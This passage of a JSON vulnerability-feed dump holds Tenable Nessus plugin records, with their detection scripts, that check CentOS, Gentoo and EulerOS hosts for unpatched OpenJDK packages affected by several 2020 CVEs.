(CVE-2020-14797)\n\n - OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4347\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-accessibility\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.8.0-openjdk-src\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-demo-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-devel-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-headless-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-1.8.0-openjdk-src-1.8.0.272.b10-1.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'java-1.8.0-openjdk / java-1.8.0-openjdk-accessibility / etc');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-02-04T09:23:11", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4305 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\n - OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 2, "cvss3": {"score": 4.2, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N"}, "published": "2021-02-01T00:00:00", "title": "CentOS 8 : java-11-openjdk (CESA-2020:4305)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "modified": "2021-02-01T00:00:00", "cpe": ["p-cpe:/a:centos:centos:java-11-openjdk-headless", "p-cpe:/a:centos:centos:java-11-openjdk-devel", "p-cpe:/a:centos:centos:java-11-openjdk", "p-cpe:/a:centos:centos:java-11-openjdk-demo", "p-cpe:/a:centos:centos:java-11-openjdk-jmods", "p-cpe:/a:centos:centos:java-11-openjdk-src", "cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:java-11-openjdk-javadoc-zip", "p-cpe:/a:centos:centos:java-11-openjdk-javadoc", "cpe:/a:centos:centos:8::appstream"], "id": "CENTOS8_RHSA-2020-4305.NASL", "href": "https://www.tenable.com/plugins/nessus/145835", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2020:4305. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145835);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/03\");\n\n script_cve_id(\n \"CVE-2020-14779\",\n \"CVE-2020-14781\",\n \"CVE-2020-14782\",\n \"CVE-2020-14792\",\n \"CVE-2020-14796\",\n \"CVE-2020-14797\",\n \"CVE-2020-14803\"\n );\n script_xref(name:\"RHSA\", value:\"2020:4305\");\n\n script_name(english:\"CentOS 8 : java-11-openjdk (CESA-2020:4305)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2020:4305 advisory.\n\n - OpenJDK: High memory usage during deserialization of Proxy class with many interfaces (Serialization,\n 8236862) (CVE-2020-14779)\n\n - OpenJDK: Credentials sent over unencrypted LDAP connection (JNDI, 8237990) (CVE-2020-14781)\n\n - OpenJDK: Certificate blacklist bypass via alternate certificate encodings (Libraries, 8237995)\n (CVE-2020-14782)\n\n - OpenJDK: Integer overflow leading to out-of-bounds access (Hotspot, 8241114) (CVE-2020-14792)\n\n - OpenJDK: Missing permission check in path to URI conversion (Libraries, 8242680) (CVE-2020-14796)\n\n - OpenJDK: Incomplete check for invalid characters in URI to path conversion (Libraries, 8242685)\n (CVE-2020-14797)\n\n - OpenJDK: Race condition in NIO Buffer boundary checks (Libraries, 8244136) (CVE-2020-14803)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:4305\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-14792\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/10/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/02/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:centos:centos:8::appstream\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-javadoc-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-jmods\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-11-openjdk-src\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/CentOS/release');\nif (isnull(release) || 'CentOS' >!< release) audit(AUDIT_OS_NOT, 'CentOS');\nos_ver = pregmatch(pattern: \"CentOS(?: Stream)?(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'CentOS');\nos_ver = os_ver[1];\nif ('CentOS Stream' >< release) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS Stream ' + os_ver);\nif (!rhel_check_release(operator: 'ge', os_version: os_ver, rhel_version: '8')) audit(AUDIT_OS_NOT, 'CentOS 8.x', 'CentOS ' + os_ver);\n\nif (!get_kb_item('Host/CentOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'CentOS', cpu);\n\npkgs = [\n {'reference':'java-11-openjdk-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-demo-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-demo-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-devel-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-devel-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-headless-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-headless-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-javadoc-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-javadoc-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-javadoc-zip-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-javadoc-zip-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-jmods-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-jmods-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-src-11.0.9.11-0.el8_2', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE},\n {'reference':'java-11-openjdk-src-11.0.9.11-0.el8_2', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'CentOS-' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'java-11-openjdk / java-11-openjdk-demo / java-11-openjdk-devel / etc');\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-29T03:05:19", "description": "The remote host is affected by the vulnerability described in GLSA-202101-19\n(OpenJDK: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenJDK. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 2, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-25T00:00:00", "title": "GLSA-202101-19 : OpenJDK: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-2590", "CVE-2020-14781", "CVE-2020-2604", "CVE-2020-2583", "CVE-2020-14798", "CVE-2020-14779", "CVE-2020-2601", "CVE-2020-14797", "CVE-2020-2659", "CVE-2020-2593", "CVE-2020-14796", "CVE-2020-2654"], "modified": "2021-01-25T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:openjdk-bin", "p-cpe:/a:gentoo:linux:openjdk-jre-bin", "p-cpe:/a:gentoo:linux:openjdk"], "id": "GENTOO_GLSA-202101-19.NASL", "href": "https://www.tenable.com/plugins/nessus/145321", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 202101-19.\n#\n# The advisory text is Copyright (C) 2001-2021 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145321);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/27\");\n\n script_cve_id(\"CVE-2020-14779\", \"CVE-2020-14781\", \"CVE-2020-14782\", \"CVE-2020-14792\", \"CVE-2020-14796\", \"CVE-2020-14797\", \"CVE-2020-14798\", \"CVE-2020-14803\", \"CVE-2020-2583\", \"CVE-2020-2590\", \"CVE-2020-2593\", \"CVE-2020-2601\", \"CVE-2020-2604\", \"CVE-2020-2654\", \"CVE-2020-2659\");\n script_xref(name:\"GLSA\", value:\"202101-19\");\n\n script_name(english:\"GLSA-202101-19 : OpenJDK: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is affected by the vulnerability described in GLSA-202101-19\n(OpenJDK: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in OpenJDK. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Please review the referenced CVE identifiers for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/202101-19\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"All OpenJDK users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-java/openjdk-8.272_p10'\n All OpenJDK (binary) users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-java/openjdk-bin-8.272_p10'\n All OpenJDK JRE (binary) users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=dev-java/openjdk-jre-bin-8.272_p10'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openjdk-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openjdk-jre-bin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-java/openjdk\", unaffected:make_list(\"ge 8.272_p10\"), vulnerable:make_list(\"lt 8.272_p10\"))) flag++;\nif (qpkg_check(package:\"dev-java/openjdk-bin\", unaffected:make_list(\"ge 8.272_p10\"), vulnerable:make_list(\"lt 8.272_p10\"))) flag++;\nif (qpkg_check(package:\"dev-java/openjdk-jre-bin\", unaffected:make_list(\"ge 8.272_p10\"), vulnerable:make_list(\"lt 8.272_p10\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"OpenJDK\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-23T09:06:56", "description": "According to the versions of the java-1.8.0-openjdk packages\ninstalled, the EulerOS installation on the remote host is affected by\nthe following vulnerabilities :\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Serialization). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks of this vulnerability can result in\n unauthorized ability to cause a partial denial of\n service (partial DOS) of Java SE, Java SE Embedded.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14779)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: JNDI). Supported versions\n that are affected are Java SE: 7u271, 8u261, 11.0.8 and\n 15 Java SE Embedded: 8u261. Difficult to exploit\n vulnerability allows unauthenticated attacker with\n network access via multiple protocols to compromise\n Java SE, Java SE Embedded. Successful attacks of this\n vulnerability can result in unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14781)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Hotspot). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data as well as unauthorized read access to\n a subset of Java SE, Java SE Embedded accessible data.\n Note: Applies to client and server deployment of Java.\n This vulnerability can be exploited through sandboxed\n Java Web Start applications and sandboxed Java applets.\n It can also be exploited by supplying data to APIs in\n the specified Component without using sandboxed Java\n Web Start applications or sandboxed Java applets, such\n as through a web service.(CVE-2020-14792)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n of Oracle Java SE (component: Libraries). Supported\n versions that are affected are Java SE: 7u271, 8u261,\n 11.0.8 and 15 Java SE Embedded: 8u261. Difficult to\n exploit vulnerability allows unauthenticated attacker\n with network access via multiple protocols to\n compromise Java SE, Java SE Embedded. Successful\n attacks require human interaction from a person other\n than the attacker. Successful attacks of this\n vulnerability can result in unauthorized update, insert\n or delete access to some of Java SE, Java SE Embedded\n accessible data. Note: This vulnerability applies to\n Java deployments, typically in clients running\n sandboxed Java Web Start applications or sandboxed Java\n applets, that load and run untrusted code (e.g., code\n that comes from the internet) and rely on the Java\n sandbox for security. This vulnerability does not apply\n to Java deployments, typically in servers, that load\n and run only trusted code (e.g., code installed by an\n administrator).(CVE-2020-14798)\n\n - Vulnerability in the Java SE, Java SE Embedded product\n 